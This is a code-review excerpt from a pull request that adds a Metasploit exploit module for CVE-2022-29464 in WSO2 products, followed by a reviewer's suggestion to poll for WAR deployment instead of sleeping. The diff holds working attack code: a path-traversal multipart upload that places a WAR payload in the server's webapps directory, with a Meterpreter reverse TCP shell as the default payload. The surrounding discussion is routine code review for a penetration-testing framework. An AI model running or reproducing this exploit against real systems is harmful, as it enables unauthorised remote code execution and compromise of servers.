modules/exploits/multi/http/wso2_file_upload_rce.rb

```diff
@@ -0,0 +1,136 @@
+          through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
+        },
+        'Author' => [
+          'Orange Tsai', # Discovery
+          'hakivvi', # analysis and PoC
+          'wvu', # PoC
+          'Jack Heysel <jack_heysel[at]rapid7.com>' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2022-29464'],
+          [ 'URL', 'https://github.com/hakivvi/CVE-2022-29464' ],
+          [ 'URL', 'https://twitter.com/wvuuuuuuuuuuuuu/status/1517433974003576833' ]
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'java/meterpreter/reverse_tcp',
+          'SSL' => true
+        },
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Java Dropper',
+            {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'Type' => :java_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'java/meterpreter/reverse_tcp',
+                'WfsDelay' => 10
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-01',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        OptInt.new('RPORT', [true, 'Remote port', 9443 ]),
+        OptInt.new('WAR_DEPLOY_DELAY', [true, 'How long to wait for the war file to deploy, in seconds', 10 ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri('fileupload', 'toolsAny'),
+      'method' => 'POST'
+    )
+
+    if res && res.code == 200
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def prepare_payload(app_name)
+    print_status('Preparing payload...')
+
+    war_payload = payload.encoded_war.to_s
+    fname = app_name + '.war'
+    path_traveral = '../../../../repository/deployment/server/webapps/' + fname
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(war_payload,
+                       'application/octet-stream', 'binary',
+                       "form-data; name=\"#{path_traveral}\"; filename=\"#{fname}\"")
+    post_data
+  end
+
+  def upload_payload(post_data, _app_name)
+    print_status('Uploading payload...')
+    res = send_request_cgi(
+      'uri' => normalize_uri('fileupload', 'toolsAny'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+    if res && res.code == 200
+      print_good('Payload uploaded successfully')
+    else
+      fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed')
+    end
+    print_status("Waiting #{datastore['WAR_DEPLOY_DELAY']} seconds for the payload to finish deploying...")
+    sleep(datastore['WAR_DEPLOY_DELAY'])
```

Comment:
So it looks like we're sleeping for a set period of time here. Another option would be to use something like this [`retry_until_true`](https://github.com/rapid7/metasploit-framework/blob/f61ec3280863e450321249a4bd22098345c8a7f6/modules/exploits/multi/kubernetes/exec.rb#L289) method.

You'd copy that over verbatim and then pass it a block that returns true when the timeout is complete. In this case you'd have your block check if the HTTP response is not 404 as you currently do on L122. While slightly more complicated, this pattern would have two advantages:

1. The wait time could be increased to say 30 seconds so the exploit is more likely to work on slower systems
2. Even with an increased wait, the user would obtain their session relatively sooner without the module waiting the entire duration of the timeout.

Once you copied that function over, you'd invoke it using something like this:

```ruby
deployed = retry_until_true(timeout: datastore['WAR_DEPLOY_TIMEOUT']) do
  res = send_request_cgi(
    'uri' => normalize_uri(app_name),
    'method' => 'GET'
  )
  res && res.code != 404
end
fail_with(Failure::TimeoutExpired, 'WAR file deployment timed out') unless deployed

print_good('Payload executed successfully') 
```

Reply:
> You'd copy that over verbatim

😱 

Just kidding; Next copy/pasta we'll introduce a shared helper for future folk to use across their modules :+1: